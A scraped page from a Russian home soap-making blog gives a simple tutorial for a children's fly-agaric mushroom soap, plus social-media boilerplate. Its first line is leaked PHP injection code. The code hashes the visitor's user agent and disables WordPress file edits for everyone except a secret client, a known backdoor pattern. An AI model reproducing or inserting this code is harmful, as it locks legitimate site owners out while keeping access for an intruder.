if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мухоморчик из доброй сказки для Вашего малыша | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мухоморчик из доброй сказки для Вашего малыша

Уроки мыловарения – это необычайно полезная вещь даже для детей. Вместе с ребенком можно сделать настоящий сказочный мухомор.

Рас­то­пи­те око­ло 50 грамм про­зрач­ной осно­вы, добавь­те крас­ный кра­си­тель, отдуш­ку и вылей­те смесь в фор­му. После засты­ва­ния возь­ми­те футляр для руч­ки и про­де­лай­те в мыле отвер­стия, вытас­ки­вая нару­жу лиш­нее. Долж­на полу­чить­ся шляп­ка гри­ба с дыроч­ка­ми. В дыроч­ки залей­те белую осно­ву. Для послед­не­го слоя в рас­топ­лен­ную про­зрач­ную осно­ву насыпь­те немно­го бле­сток. Влей­те этот слой поверх гото­вой шляп­ки. В ито­ге мы долж­ны полу­чить дет­ское мыло, сде­лан­ное сво­и­ми руками!

мух2

мух3

мух4


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!